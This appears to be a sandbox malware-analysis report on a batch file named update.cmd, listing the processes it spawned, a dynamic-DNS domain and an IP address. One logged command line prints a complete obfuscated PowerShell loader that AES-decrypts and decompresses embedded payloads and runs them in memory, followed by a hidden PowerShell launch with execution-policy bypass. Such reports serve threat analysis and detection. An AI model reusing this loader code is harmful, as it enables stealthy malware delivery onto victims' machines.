Files
Processes
Path
|
Cmdline
|
Malicious
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\update.cmd" "
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\cmd.exe
|
cmd /c "set __=^&rem"
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create();
$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
$aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cEoPe6dpwVu7fDERkKynhFR/1EqmZQt/n7wIxJrBC2M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16]
-join '')('UDOjbmgbocvvVyzcITNo4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var,
0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){
$OQQuw=New-Object System.IO.MemoryStream(,$param_var); $eDfzX=New-Object System.IO.MemoryStream; $Pftxr=New-Object System.IO.Compression.GZipStream($OQQuw,
[IO.Compression.CompressionMode]::Decompress); $Pftxr.CopyTo($eDfzX); $Pftxr.Dispose(); $OQQuw.Dispose(); $eDfzX.Dispose();
$eDfzX.ToArray();}function execute_function($param_var,$param2_var){ $umdfJ=[System.Reflection.Assembly]::('daoL'[-1..-4]
-join '')([byte[]]$param_var); $wCVTW=$umdfJ.EntryPoint; $wCVTW.Invoke($null, $param2_var);}$yEoUp = 'C:\Users\user\Desktop\update.cmd';$host.UI.RawUI.WindowTitle
= $yEoUp;$BlEZh=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($yEoUp).Split([Environment]::NewLine);foreach ($vQXry
in $BlEZh) { if ($vQXry.StartsWith('uuoNTGQdmxGwoNrYAGxC')) { $NjUsU=$vQXry.Substring(20); break; }}$payloads_var=[string[]]$NjUsU.Split('\');$payload1_var=decompress_function
(decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function
(decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function
$payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Details
|
Domains
Name
|
IP
|
Malicious
|
|||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dhhj.duckdns.org
|
12.202.180.134
|
||||||||||||||||||||||||||||||
Details
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
12.202.180.134
|
dhhj.duckdns.org
|
United States
|
||||||||||||||||||||||||||||||||
Details
|